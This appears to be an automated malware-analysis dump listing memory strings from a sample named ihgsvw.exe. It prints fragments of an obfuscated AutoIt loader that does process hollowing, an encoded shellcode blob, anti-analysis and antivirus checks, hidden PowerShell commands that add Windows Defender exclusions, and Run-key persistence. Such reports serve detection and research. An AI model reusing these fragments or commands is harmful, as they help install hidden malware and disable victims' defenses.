      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifon8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifbn;
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endiffn_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 2
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nextk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wend-m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfuncym
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif_m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfuncrm
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfuncpm)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tructsetdata($_y0x3856f9da1ec28a69, "imagebaseaddress", $_y0x3856f9de14e2ba5f487d3ca88dd6)f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)$
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "e" & "ax", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "rcx", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653),
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $_y0x3856f9c61aefba5579760c, "ptr", dllstructgetptr($_y0x3856f9da0dc886645d4a019f))
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "dword", "resumethread", "handle", $_y0x3856f9c61aefba5579760c)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61ef5a7537d61269f)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61aefba5579760c)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return dllstructgetdata($_y0x3856f9da3ef5a7537d61269990e1314a9367a9627b43cd06, "processid")0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da0ae6bc5141, $_y0x3856f9de0fe3ac427d6126889cf80e, $_y0x3856f9de0fe3ac427d61268995eb0e, $_y0x3856f9c807eaa9577d4a63f2a0)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c71deeb255777417aa96ec3c7c, $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9da0be9ba597d610c, $_y0x3856f9c70ae6bc5141, $_y0x3856f9da0fe3ac427d61269f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c708eba95741 = 3 + 7 * $_y0x3856f9c807eaa9577d4a63f2a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: while $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8 < $_y0x3856f9c71deeb255410
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029 = dllstructcreate("dword virtualaddress; dword sizeofblock", $_y0x3856f9de0ae6bc5141 + $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8)$
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "virtualaddress")"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c71deeb255777417aa96ec3c7c = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "sizeofblock")
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f = ($_y0x3856f9c71deeb255777417aa96ec3c7c - 8) / 21
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da0be9ba597d610c = dllstructcreate("word[" & $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f & "]", dllstructgetptr($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029) + 8)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c70ae6bc5141 = dllstructgetdata($_y0x3856f9da0be9ba597d610c, 1, $_y0x3856f9c717)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if bitshift($_y0x3856f9c70ae6bc5141, 12) = $_y0x3856f9c708eba95741 then,
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da0fe3ac427d61269f = dllstructcreate("ptr", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991 + bitand($_y0x3856f9c70ae6bc5141, 0xfff))"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0fe3ac427d61269f, 1, dllstructgetdata($_y0x3856f9da0fe3ac427d61269f, 1) + $_y0x3856f9c70ae2a444794b)"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_allocateexespaceataddress($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f, $_y0x3856f9c71deeb25541):
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x1000, "dword", 64)9
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_allocateexespace($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9c71deeb25541)3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", 0, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_unmapviewofsection($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f)!
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("ntdll.dll", "int", "ntunmapviewofsection", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "iswow64process", "handle", $_y0x3856f9c61ef5a7537d61269f, "bool*", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)w
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $owmi = objget("winmgmts:\\localhost\root\securitycenter2")
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe1cc89e6f4a411499bfda1b69b8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_allocateexespaceataddressu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c80ff2bc5f51660df0cdd6p\b8;u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp6u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6!u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c\u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9da3df3a9426c6725af97e9387cwu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed01c99c7540460a80acc31b7cbu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eeab5f7c770ab29ce2277c}u
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef20f3a16f5a7d218d90e33b7chu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e61ed880714b5a068fa3ca0ecu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e61ed880714b5a0387b5d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f4d411094b2ca0e7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f59570699c8bd6f7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f4974479613eab97fd307c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0ei
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_allocateexespaceataddress
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e0b8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd0bffad7d777620aa9cd6ini
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f59570699c8b6657c8t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d63t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c.t
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ed0fcb8f6f59570699cbba617cyt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b1cab98e8327ctt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2de8a55d797c31aa90e1327cot
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamezt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenut
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitems
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("regshot.exe") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("taskmgr.exe") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: word machine;word numberofsections;dword timedatestamp;dword pointertosymboltable;dword numberofsymbols;,r*
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)!q/
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5*20c39e26/304/6/3052_4f0*2_d30_2_d70c2_e///05/75f2d/50920fd43039//e6266e20444f53206d6f64652e0d0d0*24nql
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00@s0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =0;p8
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a;1p>
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a-}pz
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a+epb
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifu
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunch
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f9e720e1x~d
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bf3a765687634b29cd6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createobject("wscript.shell").run "
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df365189539|
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953(|2
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6'|!
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ev|p
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6e|o
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6t|~
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6c|m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953k
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c8{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d67{1
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0e&{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6u{_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6d{n
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953s{}
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdir
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f591
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: array
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: runonce6z?
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6qzz
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe7cde|ze
